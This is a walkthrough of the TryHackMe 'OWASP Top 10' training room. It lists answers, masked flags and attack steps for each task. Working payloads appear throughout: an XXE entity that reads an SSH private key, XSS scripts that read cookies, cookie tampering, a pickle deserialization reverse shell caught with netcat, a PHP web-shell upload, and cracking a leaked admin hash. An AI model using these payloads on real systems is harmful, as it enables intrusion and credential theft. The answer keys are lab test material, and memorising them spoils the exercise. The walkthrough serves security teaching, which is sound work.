- Tools
- Introduction
- Accessing machines
- [Severity 1] Injection
- [Severity 1] OS Command Injection
- [Severity 1] Command Injection Practical
- [Severity 2] Broken Authentication
- [Severity 2] Broken Authentication Practical
- [Severity 3] Sensitive Data Exposure (Introduction)
- [Severity 3] Sensitive Data Exposure (Supporting Material 1)
- [Severity 3] Sensitive Data Exposure (Supporting Material 2)
- [Severity 3] Sensitive Data Exposure (Challenge)
- [Severity 4] XML External Entity
- [Severity 4] XML External Entity - eXtensible Markup Language
- [Severity 4] XML External Entity - DTD
- [Severity 4] XML External Entity - XXE Payload
- [Severity 4] XML External Entity - Exploiting
- [Severity 5] Broken Access Control
- [Severity 5] Broken Access Control (IDOR Challenge)
- [Severity 6] Security Misconfiguration
- [Severity 7] Cross-site Scripting
- [Severity 8] Insecure Deserialization
- [Severity 8] Insecure Deserialization - Objects
- [Severity 8] Insecure Deserialization - Deserialization
- [Severity 8] Insecure Deserialization - Cookies
- [Severity 8] Insecure Deserialization - Cookies Practical
- [Severity 8] Insecure Deserialization - Code Execution
- [Severity 9] Components With Known Vulnerabilities - Intro
- [Severity 9] Components With Known Vulnerabilities - Exploit
- [Severity 9] Components With Known Vulnerabilities - Lab
- [Severity 10] Insufficient Logging and Monitoring
- What Next?
Room Link: https://tryhackme.com/r/room/owasptop10
$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$$\
$$ __$$\ $$ | $\ $$ |$$ __$$\ $$ __$$\ $$ __$$\
$$ / $$ |$$ |$$$\ $$ |$$ / $$ |$$ / \__|$$ | $$ |
$$ | $$ |$$ $$ $$\$$ |$$$$$$$$ |\$$$$$$\ $$$$$$$ |
$$ | $$ |$$$$ _$$$$ |$$ __$$ | \____$$\ $$ ____/
$$ | $$ |$$$ / \$$$ |$$ | $$ |$$\ $$ |$$ |
$$$$$$ |$$ / \$$ |$$ | $$ |\$$$$$$ |$$ |
\______/ \__/ \__|\__| \__| \______/ \__|
$$$$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$$$$$\
\__$$ __|$$ __$$\ $$ __$$\ $$$$ | $$$ __$$\
$$ | $$ / $$ |$$ | $$ |\_$$ | $$$$\ $$ |
$$ | $$ | $$ |$$$$$$$ | $$ | $$\$$\$$ |
$$ | $$ | $$ |$$ ____/ $$ | $$ \$$$$ |
$$ | $$ | $$ |$$ | $$ | $$ |\$$$ |
$$ | $$$$$$ |$$ | $$$$$$\\$$$$$$ /
\__| \______/ \__| \______|\______/
Badges: https://tryhackme.com/ZishanAdThandar/badges/owasp-10
- sqlite3
- Cracktation.net
- Browser Debugging Tools (CTRL+SHIFT+I)
- Browser Source Code Viewer (CTRL+U)
- Join the machine
- Read Instructions and click on Complete.
- Goto Access and get ovpn file to connect https://tryhackme.com/access
- Or, Start attackbox for testing.
- Read carefully this section and click on Complete.
- Read this section and mentioned article, then click on Complete.
- Start Machine and get Target IP from "Target Machine Information". Now, open
http://machine_ip/evilshell.php. - Now, type commands and submit. You can see output below.
- Question
What strange text file is in the website root directory?Answerdrpepper.txt. Runninglscommand will show this strange text file. - Question
How many non-root/non-service/non-daemon users are there?Answer0. Runningcat /etc/passwdwill show. - Question
What user is this app running as?Answerwww-data. Used commandwhoami. - Question
What is the user's shell set as?Answer/usr/sbin/nologin. Command usedgetent passwd www-dataorcat /etc/passwd |grep www-data. - Question
What version of Ubuntu is running?Answer ``. Command usedlsb_release -a. - Question
Print out the MOTD. What favorite beverage is shown?AnswerDR PEPPER. Used commandcat /etc/update-motd.d/00-header.
- Read this section carefully and click on Complete.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information" and open
http://MACHINE_IP:8888. - Question
What is the flag that you found in darren's account?Answerfe860794************74b667. To get flag inside darren's account, register as " darren" and login. Here you need to use whitespace before darren's name. - Test same trick with user
arthurand click on Complete. - Question
What is the flag that you found in arthur's account?Answerd9ac0f7************75e16e.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully and click on Complete.
- Read this section carefully and click on Complete.
- Read this section carefully and click on Complete.
- If we open the machine link and check source, we can get a image link to
http://machine_ip/assets/images/lake-taupo.jpg. - Now if we navigate to
http://machine_ip/assetsdirectory, there is a sensitive databse file namedwebapp.db. - Question
What is the name of the mentioned directory?Answer/assets. - Question
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?Answerwebapp.db. It's a file inside/assets. - Now Downloding the file and analyzing the file with
file webapp.dbcommand shows it's asqlite3file. Now, we can read the db file withsqlite3 webapp.db. - If we use
.tablecommand to get table names, we will see there is two table namedsessionandusers. We can get column names usingPRAGMA table_info(users);command.$> sqlite3 webapp.db SQLite version 3.37.2 2022-01-06 13:25:41 Enter ".help" for usage hints. sqlite> .tables sessions users sqlite> PRAGMA table_info(users); 0|userID|TEXT|1||1 1|username|TEXT|1||0 2|password|TEXT|1||0 3|admin|INT|1||0 sqlite>
select * from users;will show user's details inside the table. We can get admin hash there6eea9b7ef191*******0f6c05ceb.
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef191******f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite> - Question
Use the supporting material to access the sensitive data. What is the password hash of the admin user?Answer6eea9b7ef191*****dd0f6c05ceb. - Question
What is the admin's plaintext password?Answerqwe****op. We can crack the hash using CrackStation. - Question
Login as the admin. What is the flag?AnswerTHM{Yzc2Yjd*************diMjdl}. If we gotohttp://machine_ip/loginand login with usernameadminand the cracked passwordqw*****iop, it will redirect tohttp://machine_ip/console/. There we can get the flag.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully and click on Complete.
- Read this section carefully and then start answering.
- Question
Full form of XMLAnswereXtensible Markup Language - Question
Is it compulsory to have XML prolog in XML documents?AnswerNo - Question
Can we validate XML documents against a schema?AnswerYes - Question
How can we specify XML version and encoding in XML document?Answerxml prolog
- Question
How do you define a new ELEMENT?Answer!ELEMENT - Question
How do you define a ROOT element?Answer!DOCTYPE - Question
How do you define a new ENTITY?Answer!ENTITY
- Read this section carefully and click on Complete.
- Now open http://machine_ip
- Used given payload in last section to print
falcon feastand clicked on Complete. - Again used payload from last section to read
/etc/passwdand clicked on complete. - Question
What is the name of the user in /etc/passwdAnswerfalcon. We read it from output of last payload. - Now we can use same payload with replacing file from
/etc/passwdto ssh file location/home/falcon/.ssh/id_rsa. - Question
Where is falcon's SSH key located?Answer/home/falcon/.ssh/id_rsa. - New payload to read SSH file,
<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM '/home/falcon/.ssh/id_rsa'>]> <root>&read;</root>
- Question
What are the first 18 characters for falcon's private keyAnswerMIIEogI****CAQEA7b
- Read this section carefully and click on Complete.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read and understand how IDOR works and click on Complete.
- Open
http://machine_ip/and login with usernamenoteand passwordtest123, then click on Complete. - Question
Look at other users notes. What is the flag?Answerflag{fivef***three}. Got it by changing note id to 0 and visiting linkhttp://machine_ip/note.php?note=0.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully, deploy the vm and click on Complete.
- If we open the
machine_ip, we can get a webapp namePensive Notes. After googling I got default username password in a github repo https://github.com/NinjaJc01/PensiveNotes. Default credential of Pensive Notes ispensive:PensiveNotes. - Question
Hack into the webapp, and find the flag!Answerthm{4b95139*******a1f9d672e17}
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully, deploy the vm and click on Complete.
- Question
Navigate to http://machine_ip in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".AnswerThereIsMoreToXSSThanYouThink. Used payload<script>alert("Hello")</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(%22Hello%22)%3C/script%3E - Question
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.AnswerReflectiveXss4TheWin. Used payload<script>alert(window.location.hostname)</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(window.location.hostname)%3C/script%3E - Now goto
http://machine_ip/storedand create an account. - Question
Then add a comment and see if you can insert some of your own HTML.AnswerHTML_T4gs. Commented<img>inhttp://machine_ip/stored. On the same page, create an alert popup box appear on the page with your document cookies.AnswerW3LL_D0N3_LVL2Payload used<script>alert(document.cookie)</script>- Now used payload to change title from
to. Payload used<script>document.querySelector("#thm-title").textContent="I am a hacker"</script>. - Question
Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.Answerwebsites_can_be_easily_defaced_with_xss
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully.
- Question
Who developed the Tomcat application?AnswerThe Apache Software Foundation - Question
What type of attack that crashes services can be performed with insecure deserialization?AnswerDenial of Service
- Read this section.
- Question
if a dog was sleeping, would this be: A) A State B) A BehaviourAnswerA Behaviour
- Read this section.
- Question
What is the name of the base-2 formatting that data is sent across a network as?Answerbinary
- Read this section carefully.
- Question
If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?Answerwebapp.com/login/ - Question
What is the acronym for the web technology that Secure cookies work over?Answerhttps
- Open
http://machine_ip/register, create a account and login. - Press
CTRL+SHIFT+Iand goto Storage section to read and edit cookies. - Copy value of
sessionIdcookie and decode it with base64 decoder. Command to decode base64,echo "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAN2Y1MWRiYWFhZjY2NDYwMzkyNTNiNTlkOTY3NTAwYWVxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" |base64 -d. You will get the first flag. - Question
1st flag (cookie value)AnswerTHM{good******se64_huh} - Then edit
userTypecookie value toadminfromuserand reload the page and it will redirect to the admin page and show the flag. - Question
2nd flag (admin dashboard)AnswerTHM{heres******in_flag}
- Start listner to listen with
nc -lvp 4444command. - Change cookie
userTypevalue touserfromadmin. Openhttp://machine_ip/myprofile, then click onExchange on vimand after thatfeedback. Give feedback. - We need to follow instructions carefully. First we need to change download pickleme.py and "YOUR_TRYHACKME_VPN_IP" with your TryHackMe VPN IP. To get IP of TryHackMe you can use
ifconfig tun0 |grep destination |cut -d" " -f10command. Then run the python script withpython3 pickleme.py. Copy the cookie and add a cookie with that value, name itencodedPayload. Reload feedback page. You will get a netcat shell. You can read flag usingcat ../flag.txtcommand. - Question
flag.txtAnswer4a69a7***fd68
- Read Instructions and click on Complete.
- Read Instructions and click on Complete.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- When we open
http://machine_ip, we get link tohttp://machine_ip/admin.phpandprojectworlds.inlink. After searching bookstore onprojectworlds.in, we get this page https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ with default credential username: [email protected] password: admin. - After logging into admin panel, we can upload our shell by editing any book. Shell code,
<?php system('wc -c /etc/passwd'); ?>in shell.php. After going to edit book, upload shell.php withchangebutton. - Now to find the shell, open location of image. You can find all images in
/bootstrap/imgdirectory. Just open the directory in the link, you can get your uploaded shell there,http://machine_ip/bootstrap/img/shell.php. If you open the page, it will compile and execute the code to display character number of/etc/passwd. - Question
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)Answer1611
- Read this section carefully.
- Question
What IP address is the attacker using?Answer49.99.13.16. We can check lot of unauthorized login from this ip. - Question
What kind of attack is being carried out?AnswerBruteforce. As we can see many unatuthorized usernames requested.
- Just click Complete. Done!
Author: Zishan Ahamed Thandar